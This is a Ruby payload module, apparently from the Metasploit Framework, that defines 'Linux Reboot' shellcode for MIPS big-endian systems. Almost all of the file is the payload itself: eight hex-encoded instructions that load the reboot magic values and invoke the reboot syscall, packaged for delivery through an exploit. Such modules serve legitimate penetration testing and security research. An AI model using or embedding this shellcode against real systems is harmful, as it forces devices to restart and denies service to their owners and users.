1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 32
8

9
  include Msf::Payload::Single
10

11
  def initialize(info = {})
12
    super(
13
      merge_info(
14
        info,
15
        'Name' => 'Linux Reboot',
16
        'Description' => %q{
17
          A very small shellcode for rebooting the system.
18
          This payload is sometimes helpful for testing purposes or executing
19
          other payloads that rely on initial startup procedures.
20
          Requires CAP_SYS_BOOT privileges.
21
        },
22
        'Author' => [
23
          'Michael Messner <devnull[at]s3cur1ty.de>', # metasploit payload
24
          'rigan - <imrigan[at]gmail.com>' # original payload
25
        ],
26
        'References' => [
27
          ['URL', 'https://man7.org/linux/man-pages/man2/reboot.2.html'],
28
          ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']
29
        ],
30
        'License' => MSF_LICENSE,
31
        'Platform' => 'linux',
32
        'Arch' => ARCH_MIPSBE,
33
        'Payload' => {
34
          'Offsets' => {},
35
          'Payload' => ''
36
        }
37
      )
38
    )
39
  end
40

41
  def generate(_opts = {})
42
    shellcode =
43
      "\x3c\x06\x43\x21" +  # lui     a2,0x4321
44
      "\x34\xc6\xfe\xdc" +  # ori     a2,a2,0xfedc
45
      "\x3c\x05\x28\x12" +  # lui     a1,0x2812
46
      "\x34\xa5\x19\x69" +  # ori     a1,a1,0x1969
47
      "\x3c\x04\xfe\xe1" +  # lui     a0,0xfee1
48
      "\x34\x84\xde\xad" +  # ori     a0,a0,0xdead
49
      "\x24\x02\x0f\xf8" +  # li      v0,4088
50
      "\x01\x01\x01\x0c"    # syscall 0x40404
51

52
    return super + shellcode
53
  end
54
end
55

56